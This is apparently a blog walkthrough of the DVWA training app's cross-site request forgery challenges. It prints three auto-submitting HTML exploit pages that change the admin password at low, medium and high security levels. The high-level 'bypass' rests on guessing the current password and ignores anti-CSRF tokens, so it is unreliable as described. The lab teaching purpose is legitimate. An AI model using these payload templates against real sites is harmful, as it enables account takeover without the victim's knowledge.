DVWA CSRF Challenges Solutions | Cross Site Request Forgery

DVWA or Damn Vulnerable Web App is a PHP based web application for Practising Web Pentesting and learn about web vulnerabilities in a safe environment. For the instruction to install DVWA in your system please visit the below link :

        http://www.sec-art.net/2018/06/how-to-install-dvwadamn-vulnerable-web.html

 Now in this post we are going to look at The CSRF example in DVWA. For basics example of CSRF please visit our previous post :

        Introduction to CSRF

and the exploit codes used below can be downloaded from : Github_Repo

 In the CSRF example, there is a password change page, where we can change the admin password. At here the password can also be change by using a malicious page, which submit the password change request to the server automatically.

Now first change the security level to low, just go to the DVWA security page and change it from there or visit the installation page( links given above ) and open the CSRF page.


Now the exploit code for change the password is :

csrf_low.html
<!-- exploit for Challenge  : CSRF vulnerability DVWA (at low security settings)-->
<html>
  <body onload="document.getElementById('xsrf').submit();">
    <form id="xsrf" method="GET" action="http://192.168.56.102/dvwa/vulnerabilities/csrf/">
      <input name="password_new" type="hidden" value="hacked">
      <input name="password_conf" type="hidden" value="hacked">
      <input name="Change" type="hidden" value="Change">
    </form>
  </body>
</html>
Now when we open the above page, then it will will automatically submit the above get form to the server and change the password to "hacked".


So, the password is changed within an external malicious page, now if we logout and re-login to DVWA then we have to put the password "hacked".

Now lets change the security level to medium. In the medium security level, there is a catch,


At here the password reset option is only gonna work if we open it on the local system with IP 127.0.0.1, so the csrf exploit is same but with the server address with 127.0.0.1

csrf_med.html
<!-- DVWA CSRF Bypass (Medium level security)-->
<html>
  <body onload=document.getElementById('csrf').submit()>
      <form id="csrf" method="GET" action="http://127.0.0.1/dvwa/vulnerabilities/csrf/">
      <input type="password" name="password_new" value="password">
      <input type="password" name="password_conf" value="password">
      <input type="text" value="Change" name="Change">
    </form>
  </body>
</html>
The above exploit code will change the password to "password".


Now at the high security level we can see that CSRF attack will not be practical because we have to submit the current password also in order to successfully change the password.


But it can also be exploitable with CSRF attack, for that the code will be

csrf_high.html
<!-- DVWA CSRF Bypass (high level security)-->
<html>
  <body onload=document.getElementById('csrf').submit()>
    <form id="csrf" method="GET" action="http://192.168.56.102/dvwa/vulnerabilities/csrf/">
      <input type="password" name="password_current" value="password">
      <input type="password" name="password_new" value="hacked">
      <input type="password" name="password_conf" value="hacked">
      <input type="text" value="Change" name="Change">
    </form>
  </body>
</html>



Conslusion :

So that's it about the CSRF challenges in DVWA. For more information about CSRF vulnerability and also other vulnerability please visit the below link :

         http://www.sec-art.net/p/web-security.html